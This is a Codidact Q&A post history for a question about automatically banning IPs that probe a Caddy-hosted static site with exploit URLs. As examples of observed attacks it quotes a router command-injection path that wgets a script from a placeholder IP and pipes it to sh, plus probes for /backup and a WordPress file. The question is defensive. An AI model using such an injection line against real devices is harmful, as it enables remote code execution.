Communities

Writing
Writing
Codidact Meta
Codidact Meta
The Great Outdoors
The Great Outdoors
Photography & Video
Photography & Video
Scientific Speculation
Scientific Speculation
Cooking
Cooking
Electrical Engineering
Electrical Engineering
Judaism
Judaism
Languages & Linguistics
Languages & Linguistics
Software Development
Software Development
Mathematics
Mathematics
Christianity
Christianity
Code Golf
Code Golf
Music
Music
Physics
Physics
Linux Systems
Linux Systems
Power Users
Power Users
Tabletop RPGs
Tabletop RPGs
Community Proposals
Community Proposals
tag:snake search within a tag
answers:0 unanswered questions
user:xxxx search by author id
score:0.5 posts with 0.5+ score
"snake oil" exact phrase
votes:4 posts with 4+ votes
created:<1w created < 1 week ago
post_type:xxxx type of post
Search help
Notifications
Mark all as read See all your notifications »
Users Search
Help Dashboard Sign In Sign Up
Q&A Meta
Q&A
Posts Tags Edits
Ask Question

Post History

80%
+6 −0
Q&A How to automatically block IPs that try exploit URLs?

I have a static website I serve with Caddy. The Caddy is inside a container. I notice that occasionally I get malicious requests, looking at the paths requested. Some examples are: /cgi-bin/luc...

1 answer  ·  posted 5mo ago by matthewsnyder‭  ·  last activity 5mo ago by GeraldS‭

Question server security caddy
#2: Post edited by user avatar Michael‭ · 2024-10-02T01:45:18Z (5 months ago)
Fix markdown with backtick inside 
How to automatically block IPs that try exploit URLs?
  • I have a static website I serve with Caddy. The Caddy is inside a container.
  • I notice that occasionally I get malicious requests, looking at the paths requested. Some examples are:
  • * `/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`wget+http://[ some ip ]/t+-O-+|+sh`)`
  • * `/backup`
  • * `/wp-admin/css/about.php`
  • These are obviously hackers trying some common exploits to see if they'll get lucky and I want to block them automatically. For example, I could provide a list of string patterns and maybe any IP that requests a path that matches those will get an IP ban for a month.
  • I realize hackers can obtain fresh IPs in various ways. I still want to do the IP ban just to make their life harder.
  • How can I do this?
  • I have a static website I serve with Caddy. The Caddy is inside a container.
  • I notice that occasionally I get malicious requests, looking at the paths requested. Some examples are:
  • * ``/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`wget+http://[ some ip ]/t+-O-+|+sh`)``
  • * `/backup`
  • * `/wp-admin/css/about.php`
  • These are obviously hackers trying some common exploits to see if they'll get lucky and I want to block them automatically. For example, I could provide a list of string patterns and maybe any IP that requests a path that matches those will get an IP ban for a month.
  • I realize hackers can obtain fresh IPs in various ways. I still want to do the IP ban just to make their life harder.
  • How can I do this?
server security caddy
server security caddy
#1: Initial revision by user avatar matthewsnyder‭ · 2024-10-01T19:24:33Z (5 months ago) 
How to automatically block IPs that try exploit URLs?
I have a static website I serve with Caddy. The Caddy is inside a container.

I notice that occasionally I get malicious requests, looking at the paths requested. Some examples are:

* `/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`wget+http://[ some ip ]/t+-O-+|+sh`)`
* `/backup`
* `/wp-admin/css/about.php`

These are obviously hackers trying some common exploits to see if they'll get lucky and I want to block them automatically. For example, I could provide a list of string patterns and maybe any IP that requests a path that matches those will get an IP ban for a month.

I realize hackers can obtain fresh IPs in various ways. I still want to do the IP ban just to make their life harder.

How can I do this?
server security caddy